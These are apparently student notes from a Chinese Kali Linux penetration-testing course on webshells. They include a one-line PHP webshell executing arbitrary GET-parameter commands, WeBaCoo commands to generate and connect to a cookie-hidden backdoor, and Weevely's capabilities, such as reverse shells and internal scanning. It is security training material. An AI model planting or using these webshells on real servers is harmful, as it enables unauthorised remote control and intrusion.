846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

WEBSHELL

 <?php echo shell_exec($_GET['cmd']); ?>

中国菜刀

 www.maicaidao.co

kali webshell

 WeBaCoo(Web Backdoor Cookie)

 类终端的shell

 编码通信内容通过cookie头传输,隐蔽性强

 cm:base64编码命令

 cn:服务器用于返回数据的cookie头名

 cp:返回信息的定界符

 生成服务端

 webacoo -g -o a.php

 客户端连接

 webacoo -t -u "http://1.1.1.1/a.php"

 连接成功,获得一个命令行shell

 

 -f 使用php操作系统函数

 -r 返回不经过混淆的代码

 -e 单条命令执行

 -m 指定http参数提交方法

 -c 指定cookie名

 -d 定界符,默认是随机的

 -a 指定user-ahent

 -p 支持代理

 -v 信息详细的等级

 -l 记录日志

 update 升级版本

 

Weevely 

 针对php

 隐蔽的类终端PHP Webshell

 30多个管理模块

 执行系统命令,浏览文件系统

 检测常见配置错误

 创建正向反向shell

 通过目标计算机代理http流量

 从目标计算机运行端口扫描,渗透内网

支持连接密码

 可能缺少 pySocks 库

命令简单

help查看有哪些模块

[展开全文]
hl0rey · 2017-02-13 · WEBSHELL 0